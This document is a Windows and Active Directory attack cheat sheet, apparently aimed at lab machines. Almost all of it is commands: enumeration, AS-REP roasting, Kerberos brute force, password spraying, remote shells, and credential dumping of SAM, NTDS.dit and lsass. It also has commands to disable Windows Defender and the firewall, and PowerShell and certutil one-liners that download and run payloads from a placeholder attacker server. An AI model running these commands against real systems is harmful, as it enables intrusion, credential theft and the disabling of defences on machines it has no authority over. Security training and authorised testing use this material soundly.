Ldap enumeration
$ enum4linux -a 10.10.10.180
$ smbclient -L \\10.10.10.180 -N
$ ldapsearch -x -H ldap://10.10.10.180 -b "dc=DOMAIN,dc=LOCAL"
$ python windapsearch.py -u username -p password -d DOMAIN.LOCAL --dc-ip 10.10.10.180
$ python ad-ldap-enum.py -d DOMAIN.LOCAL -l 10.10.10.180 -u username -p password
Find some useful credentials:
$ GetNPUsers.py -dc-ip 10.10.10.180 -no-pass "DOMAIN.LOCAL/username"
$ smbclient -U username -L \\10.10.10.180
Connect
$ evil-winrm -i 10.10.10.180 -u username -p password
$ psexec.py username:password@10.10.10.180
$ wmiexec.py -hashes :d9485863c1e9e05851aa40cbb4ab9dff Username@10.10.10.180
Crack/Bruteforce
$ hashcat -m 18200 -a 0 -w 3 hashfile.hash rockyou.txt
Username brute:
$ ./kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.180 users.txt
Password brute
$ ./kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.180 rockyou.txt username123
Password spray
$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.180 users.txt rockyou.txt
https://github.com/dafthack/DomainPasswordSpray
> Import-Module .\DomainPasswordSpray.ps1
> Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
Crack Tickets:
$ python tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbi
CrackMapExec:
$ crackmapexec smb 10.10.10.180 -u '' -p ''
$ crackmapexec <protocol> 10.10.10.180
Changing Permissions of a File:
> icacls file.txt /grant Everyone:F
Downloading files
> IEX (New-Object System.Net.WebClient).DownloadString("http://ATTACKER_IP/rev.ps1")
> (New-Object System.Net.WebClient).DownloadFile("http://ATTACKER_SERVER/malware.exe", "C:\Windows\Temp\malware.exe")
> Invoke-WebRequest "http://ATTACKER_SERVER/malware.exe" -OutFile "C:\Windows\Temp\malware.exe"
> certutil.exe -urlcache -split -f "http://10.10.10.180:80/shell.exe" shell.exe
Privilege Escalation:
Autlogon settings:
> Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
Dump:
$ secretsdump.py -dc-ip 10.10.10.180 defaultUserName:defaultPassword\!@10.10.10.180
Dump SAM file:
$ impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL
$ impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL
NTDS.dit dump:
$ secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit -outputfile /tmp/result local
$ crackmapexec.py 10.10.10.180 -u username -p password -d DOMAIN.LOCAL --ntds drsuapi
on DC, lsass.exe can dump hashes
> lsadump::lsa /inject
Recon:
> systeminfo
> hostname
Especially good with hotfix info
> wmic qfe get Caption,Description,HotFixID,InstalledOn
What users/localgroups are on the machine?
> net users
> net localgroups
> net localgroup Administrators
> net user username
Crosscheck local and domain too
> net user username /domain
> net group Administrators /domain
Network information
> ipconfig /all
> route print
> arp -A
To see what tokens we have
> whoami /priv
What we can access?
> whoami /groups
Recursive string scan
> findstr /spin "password" *.*
Running processes
> tasklist /SVC
Network connections
> netstat -ano
Search for writeable directories
> dir /a-r-d /s /b
Show files/dir and hidden
> dir -force
Windows Defender
> sc.exe config WinDefend start= disabled
> sc.exe stop WinDefend
> Set-MpPreference -DisableRealtimeMonitoring $true
Firewall
> Netsh Advfirewall show allprofiles
> NetSh Advfirewall set allprofiles state off
Useful tools/modules
Impacket : https://github.com/CoreSecurity/impacket
Pywinrm : https://github.com/diyan/pywinrm
Pywerview : https://github.com/the-useless-one/pywerview
PowerSploit : https://github.com/PowerShellMafia/PowerSploit
Invoke-Obfuscation : https://github.com/danielbohannon/Invoke-Obfuscation
Invoke-Vnc : https://github.com/artkond/Invoke-Vnc
Mimikittenz : https://github.com/putterpanda/mimikittenz
NetRipper : https://github.com/NytroRST/NetRipper
RandomPS-Scripts : https://github.com/xorrior/RandomPS-Scripts
SessionGopher : https://github.com/fireeye/SessionGopher
Mimipenguin : https://github.com/huntergregal/mimipenguin
